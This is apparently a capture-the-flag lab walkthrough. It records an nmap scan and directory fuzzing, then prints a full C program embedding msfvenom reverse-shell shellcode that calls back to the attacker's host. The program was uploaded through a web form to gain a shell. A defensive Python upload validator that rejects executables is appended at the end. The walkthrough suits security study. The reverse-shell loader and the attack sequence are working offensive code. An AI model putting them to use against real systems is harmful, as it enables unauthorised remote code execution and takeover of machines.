Command: nmap -A -Pn 192.168.243.171
Nmap initial output
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 01:03 EDT
Nmap scan report for 192.168.243.171
Host is up (0.21s latency).
Not shown: 948 filtered tcp ports (no-response), 49 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 0c:f7:57:49:fc:d4:4e:73:97:2c:25:a2:6a:36:5b:2c (RSA)
| 256 87:35:fd:bc:0a:69:ff:e7:7f:4c:54:c7:bd:29:1d:b9 (ECDSA)
|_ 256 2d:8b:f2:70:c4:57:44:62:d5:80:d6:0b:6e:31:a9:75 (ED25519)
**80/tcp open http Apache httpd 2.4.37 ((centos))**
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
|_http-server-header: Apache/2.4.37 (centos)
9090/tcp closed zeus-admin
Aggressive OS guesses: Linux 4.4 (92%), Linux 4.9 (91%), Linux 3.10 - 3.12 (90%), Linux 4.0 (89%), Linux 3.10 - 3.16 (88%), Linux 3.11 - 4.1 (88%), Linux 2.6.32 (88%), Linux 3.4 (88%), Linux 3.5 (88%), Linux 4.2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 9090/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 192.168.243.172
2 205.23 ms 192.168.243.171
Visiting port 80 only shows the Apache default page, so the possible pages have to be fuzzed. Oddly, though, several wordlists were tried with gobuster and ffuf and none of them found the target page.
ffuf -u http://192.168.243.171/FUZZ -w /usr/share/dirb/wordlists/big.txt
ffuf -u http://192.168.243.171/FUZZ -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://192.168.243.171/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
None of the three commands above found what was needed; in the end it was gobuster with an explicit file extension that found it.
gobuster dir -u http://192.168.243.171 -w /usr/share/wordlists/dirb/common.txt -e -x html

Visit: http://192.168.243.171/upload.html

There is an upload function. Following its requirements, write the following code (see the textbook, P404):
```c
#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdint.h>   /* intptr_t */
#include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
// To compile:
// gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
// gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl
// msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=80 -f c
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x00\x50\xc0\xa8\x31\xf3\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

int main(void)
{
    printf("I love programming.");
    // Fork a child process from the current one
    if (fork() == 0)
    {
        // Execute the shellcode in the child
        intptr_t pagesize = sysconf(_SC_PAGESIZE);
        // Make the page holding buf executable (mprotect returns 0 on success)
        if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
            // Handle error
            perror("mprotect");
            return -1;
        }
        // Cast the buffer to a function pointer and call it
        int (*ret)(void) = (int (*)(void))buf;
        ret();
    }
    else
    {
        printf("[Hijacked] Returning from function...\n");
    }
    // This shouldn't really execute
    printf("[Hijacked] Returning from main...\n");
    return 3;
}
```
Compile command: gcc -Wall -fPIC -z execstack -o rev.elf rev.c
Upload it and receive the returned shell:

Spawn a pseudo-terminal:

Find the flag:
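The foothold above came from an upload form that stored and executed an ELF binary as received. As an added defender-side example, not code from the walkthrough or the lab, here is a server-side upload check that decides on the file's bytes before its client-supplied name; the extension allowlist, size limit and sample inputs are my own assumptions.

```python
"""Content-first upload validation (added example; assumptions are mine)."""
import os

# Magic-byte prefixes of executable formats the endpoint must never keep.
EXECUTABLE_MAGIC = {
    b"\x7fELF": "ELF binary",
    b"MZ": "PE/DOS executable",
    b"#!": "script with shebang",
}

# Assumed allowlist of what this endpoint is meant to accept.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".pdf", ".txt"}
PNG_HEADER = b"\x89PNG\r\n\x1a\n"
MAX_SIZE = 5 * 1024 * 1024  # assumed 5 MiB limit


def classify_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason).

    The bytes are inspected before the filename, because the name is
    attacker-controlled: a renamed ELF ("rev.png") is still rejected.
    """
    if len(data) > MAX_SIZE:
        return False, "file too large"
    for magic, desc in EXECUTABLE_MAGIC.items():
        if data.startswith(magic):
            return False, f"executable content rejected: {desc}"
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension not allowed: {ext or '(none)'}"
    # Where the format has a fixed header, require the name and bytes to agree.
    if ext == ".png" and not data.startswith(PNG_HEADER):
        return False, "content does not match .png header"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: a fake ELF header renamed to .png, a PNG header,
    # a plain text file and a shell script.
    samples = {
        "rev.png": b"\x7fELF\x02\x01\x01" + b"\x00" * 9,
        "photo.png": PNG_HEADER + b"\x00" * 8,
        "notes.txt": b"hello",
        "run.sh": b"#!/bin/sh\necho hi\n",
    }
    for name, blob in samples.items():
        print(name, classify_upload(name, blob))
```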